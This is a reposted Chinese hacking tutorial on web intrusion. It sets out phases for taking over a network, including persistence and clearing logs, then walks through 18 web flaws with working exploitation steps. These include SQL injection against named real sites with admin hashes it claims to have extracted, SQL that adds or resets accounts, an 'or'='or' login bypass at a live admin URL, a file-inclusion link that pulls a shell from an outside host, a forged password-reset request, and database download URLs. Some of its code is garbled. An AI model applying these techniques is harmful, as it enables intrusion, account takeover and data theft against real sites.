搜索
您的当前位置:首页正文

入侵思路-攻击篇-常见WEB攻击

来源:尚车旅游网


攻击类型

第一部分 常见WEB攻击

一.按传统攻击分类,大概有以下几阶段

1.漏洞探察,端口探测

2.攻击外部入口

3.架设连接内部网络的程序

4.攻击内部网络

5.攻击内部主机或网络,建立外连通道

6.扩大内部网络攻击渗透的范围,下载传输内部网络的资料

7.固定内部网络的战果,建立长期入侵通道

8.清理入口,内部网络留下的工作日志

9.尽量是内部网络和外部入口设备和机器保持网络管理员看起来的正常,减少网络传输的频率,保证能长期占领该网络

二.下面就直接讲入侵的传统手法

1.常见的就是扫描该网络的出口,找到映射出来的端口

2.弱口令猜解,溢出,WEB渗透的办法,另外还有一些网络欺骗的手段,最后就是社会工程的方法搞定外部入口

3.现在网络基本上的外部入口不会有特别的端口,常见协议有FTP,SSH,POP3,SMTP,WEB,telnetd,还有某些协议代理的端口,所以基本可用的方法首先就是溢出,大家可以去看看0DAY,实在没有就去找找发布过的1DAY,但是一般的没有太大的成功几率.

4.我这里谈的攻击,主要谈谈通过WEB的渗透办法

三.传统的WEB漏洞

3.1. 目录浏览

通过浏览地址http://IP/docquery,可以查看到docquery目录下的所有文件的名称

3.2. 备份页面暴源码

管理员为了维护的方便,会在web页面的目录保存页面编辑时候的备份文件,或者是由于某些编辑软件自动生成bak为扩展名的页面文件,导致在浏览器直接可以查看页面文件源代码

3.3. 默认管理页面漏洞

比如

安装的是tomcat,存在默认管理页面http://IP/admin/index.jsp,并且没有更改默认的登陆帐号的密码,使用默认的账号密码可以登录。通过上传木马可以轻易就获得WEBSHELL,由于tomcat以服务运行,因此直接获得system权限

3.4 SQL 注入

比如,http://IP/Page.jsp?City=天津

该链接存在注入漏洞,参数city附近语法不严格导致产生注入点,可以使用数据库猜解工具得到数据库中的数据。

比如, 漏洞测试网站一:云南黑客联盟

申请一个用户,登陆,然后发表文章,D:YNHACKUSER../inc/cls_main.asp网站路径

管理员数小于5,管理员数为3,第一个管理员用户名长度小于7,第一个管理员用户名长度为5用户名第一个字母为a,第一个管理员用户名为 admin,MD5密码第一个是7,后面的我就不猜了,和猜用户名同一个道理,不过,这里长度有16位。手工很慢,为此,使用UNION查寻来提高效率,

第一个管理员用户名 admin md5密码 7a57a5a743894a0e->admin.现在网速太慢。被锁定了,这是第二个管理员 liucho0400 密码 b086f71d080453fa,第三个 灵男 密码581abc28e23d1669,后面的工作我就不作了,如果拿到解密后的密码进入后台轻易得到WEBSHELL

漏洞测试网站二:新云官方网站

不能注册,社会工程学来 admin admin 不行 123 123 不行,123456 123456 成功进入,发表文章进行了错误处理,提交 --,正常,说明是sql版,直接加用户,我们在nc_user中加一个用户名和密码

都为 123的用户,先MDB转化一下,123->ac59075b964b0715,提交

insert into nc_user(username,password) values('123','ac59075b964b0715'),现在登陆试试,

可能数据库中有这个用户了吧,那我们它密码

update nc_user set password='ac59075b964b0715' where username='123',成功。

现在利用辅助工具注入,前提是要登陆,不好意思,要用123456登陆才能看自己的文章

好,现在已成功注入了。

至于拿WEBSHELL的事,我就不去搞了。大家自己发挥吧

3.5 登陆验证不严

当尝试输入登陆为:1’ or 1=1--时提示密码错误,说明程序已经接受了不合格登陆输入 conetmibver1.0漏洞直接进入后台

关键字:co net mib ver 1.0 design by hypo

安全漏洞利用方法:

后台管理界面:http://www.boy-girl.cn/manage/Login.asp

然后利用漏洞 'or'='or'登录。

3.6 跨站

构建链接http://IP/IDC.jsp?Sex=男&Sex=女

&strArea=0”>,界面弹出JAVASCRIPT对话框“HELLO,MATRIXAY!”。

3.7任意文件被下载

https://ip/download.jsp?downpath=down.jsp

只要知道文件路径,可以下载系统中的任意文件。

3.8 暴露绝对路径

提交特殊参数,导致页面出错,暴露页面文件的绝对路径

3.9 命令解释行的脚本命令

http://IP/cmd.pl?dir+c:\\

服务器存在类似的脚本解释程序,可以执行服务器上的命令

3.10 存在upload.asp等类似文件上传文件的利用

可以使用桂林老兵等上传程序突破文件名限制上传WEBSHELL木马,或者用nc.exe上传也可以

3.11 .php脚本远程文件包含漏洞

.php脚本没有正确地验证某些变量的数据,允许攻击者通过包含本地或外部资源的任

意文件导致执行任意PHP代码。

http://www.example.com/wp-includes/functions.php?file=http://www.example2.com/shell.txt?

3.12 session欺骗漏洞

比如, 拥原创文学整站程序:

(1).注入漏洞:list.asp对articleID变量没做过滤导致注入漏洞,还有dispac.asp文件对id变量没做过滤,但是这个文件要管理员登陆后才能注入,所以有点像鸡漏洞。

(2)session欺骗漏洞:和上面的方法一样,写一个asp文件session(\"idu\")=\"black-you\"进后台看看吧!!

3.13 cookies注入

比如, 雷霆购物系统:

我们先来看看reseach.asp才是真正的搜索文件,其中又这样一段代码:

ifname<>\"\"then

sql=sql&\"andnamelike'%\"&name&\"%'\"

endif

ifauthor<>\"\"then

sql=sql&\"andauthorlike'%\"&author&\"%'\"

endif

ifmanufacturer<>\"\"then

sql=sql&\"andmarklike'%\"&manufacturer&\"%'\"

endif

ifcode<>\"\"then

sql=sql&\"andcategoryidlike'%\"&code&\"%'\"

这就是经典的填字游戏!!因为它在高级搜索页面作了javascript过滤,所以我们要用nc提交来进行cookies注入。但我们也可以在快速搜索页面提交:“504%’注入语句’%504”就能注入了,抓包然后把地址放在NBSI里就能注入了,因为我的IIS有点问题,所有就没深入测试。

3.14 cookies欺骗漏洞

Forget.asp是密码找回文件文件,repws.asp是修改密码文件,我们来看看它的部分代码:

<%

ifrequest(\"username\")=\"\"then

callMsgBox(\"非法使用!\

response.end

endif

dimtmp

setrs=server.CreateObject(\"adodb.recordset\")

'提交修改密码

ifnotisempty(request(\"SubmitRePws\"))then

ifrequest(\"password\")<>request(\"password2\")thencallMsgBox(\"再次输入密码不一致!\

rs.open\"selectpasswordfrom[user]whereusername='\"&trim(request(\"username\"))&\"'\

rs(\"password\")=md5(trim(request(\"password2\")))

rs.update

rs.close

callMsgBox(\"您的密码取回成功,请登录!\

response.end

endif

rs.open\"selectanswerfrom[user]whereusername='\"&trim(request(\"username\"))&\"'\

tmp=trim(rs(\"answer\"))

rs.close

iftmp<>md5(request(\"answer\"))then

callMsgbox(\"对不起,您输入的问题答案不正确\

response.end

endif

setrs=nothing

%>

呵呵,笑了吧!我们现在来构造数据包:

POST/lt/repws.aspHTTP/1.1

Accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flash,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*

Referer:http://localhost/lt/repws.asp Accept-Language:zh-cn

Content-Type:application/x-www-form-urlencoded

Accept-Encoding:gzip,deflate

User-Agent:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;SV1;Maxthon)

Host:localhost

Content-Length:72

Connection:Keep-Alive

Cache-Control:no-cache

Cookie:ASPSESSIONIDQGQGQXOO=IFKFCOFAPEOINKPNGDEJEKOF

password=121212&password2=121212&SubmitRePws=%CC%E1%BD%BB&username=x-key

修改就把ueername和password、possword2还有Content-Length修改一下就行了,其他的都不用改。我们现在用nc提交:nclocalhost80<1.txt>1.htm,如图3所示,

然后我们运行一下1.htm,就会看到图4的消息框了!

3.15一句话木马插入到数据库当中

网络呼机

网络呼机AllRightsReserved聊天室进入方式在线

利用的数据库文件名:http://目标IP/3a4b5c.asp,将一句话木马插入到上面的数据库当中。

注册进入后在留言里面写入一句话木马:

3.16 本地存网页欺骗服务器

比如, TRSWAS4.0系统

关键字:TRSWAS

安全漏洞利用方法:详见“C:\emp\\SQL注入相关\\TRS系统漏洞利用.html”

TRS业务管理系统用户密码提示

 

cellPadding=4cellSpacing=0width=\"90%\">

修改密码:

 

请输入您的新密码:

请确认您的新密码:



\"border=0height=21src=\"../../images/button-cancle.gif\"onMouseOver=\"this.style.cursor='hand'\"onclick=\"window.close()\">


请填写您的新密码,并且牢记此密码。


密码修改成功后,您可以直接用此密码登录系统。

Copyright1998-2000href=\"http://www.trs.com.cn\"target=_blank>TRSAllrights

信息技术有限公司

reserved.


3.17 下载数据库文件

比如, Comersus商场系统

关键字:powered by comersus ASP shopping cart

安全漏洞利用方法:

http://www.hhps.tp.edu.tw/Comersus/database/comersus.mdb 下载数据库

后台管理界面

再比如,mdb数据库改成asp的情况:

梦想天堂是一款多用户的记事本程序,如下图所示,我们今天要分析的就是这款日记本程序。

我们先来看一下inc文件夹下的数据库连接文件conn.asp,我把它的代码复制到下面:

<%

Dim conn

Dim sqlstr

Dim db

'更改数据库名字

db=\"data/aqbt.cn.asp\"

set conn = Server.CreateObject(\"ADODB.Connection\")

sqlstr=\"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\" & Server.MapPath(\"\"&db&\"\")

conn.Open sqlstr

%>

<%

dim listnum,reguservalue

listnum=16 '定义每页显示日记数量

reguservalue=1 '这里 1允许新用户注册,0不允许新用户注册

cnt_new=20 '首页显示的新日记数

usernum=13 '首页显示的推荐会员数

'过滤非法字符

function HTMLEncode(fString)

fString = replace(fString, \">\\">\")

fString = replace(fString, \"<\\"<\")

fString = Replace(fString, CHR(32), \" \")

fString = Replace(fString, CHR(34), \"\"\")

fString = Replace(fString, CHR(39), \"'\")

fString = Replace(fString, CHR(13), \"\")

fString = Replace(fString, CHR(10) & CHR(10), \"

\")

fString = Replace(fString, CHR(10), \"
\")

HTMLEncode = fString

end function

%>

从coon.asp文件中我们看到程序的数据库连接部分没有进行任何的容错处理,这就意味着存在暴库的可能性。我们直接访问inc/conn.asp 来看看,如下图所示,成功的暴出了数据库的物理路径!(如果你的浏览器返回的是HTTP500错误,请到IE的选项中关闭显示友好的HTTP请求)

我们暴出了数据库的路径是 http://221.195.40.85:81/data/aqbt.cn.asp。我们发现数据库也并未做任何的防下载处理。直接上下载软件(我这里用的是Flashget)下载它的数据库。如图所示,成功的下载了它的数据库文件:

更改后缀名asp为mdb。我们再用数据库浏览工具打开数据库看看:

3.18暴库漏洞

看这一段代码:

SetRs=Server.CreateObject(\"Adodb.RecordSet\")

SetRu=Server.CreateObject(\"Adodb.RecordSet\")

SetConn=Server.CreateObject(\"ADODB.Connection\")

Conn.ConnectionString=\"Provider=Microsoft.Jet.OLEDB.4.0;\"&_

\"DataSource=\"&Server.MapPath(\"db1.mdb\")

Conn.Open

没有加入容错语句onerrorresumenext,在看到参数的网址,把最后一级目录的/改为%5c

总结一下,这里讲了18种WEB入侵时候的漏洞,当然这些可以被认为是最基本的18种WEB漏洞,我下面一个章节讲WEB漏洞的具体利用方法,这里的第一部分就到此,

因篇幅问题不能全部显示,请点此查看更多更全内容

Top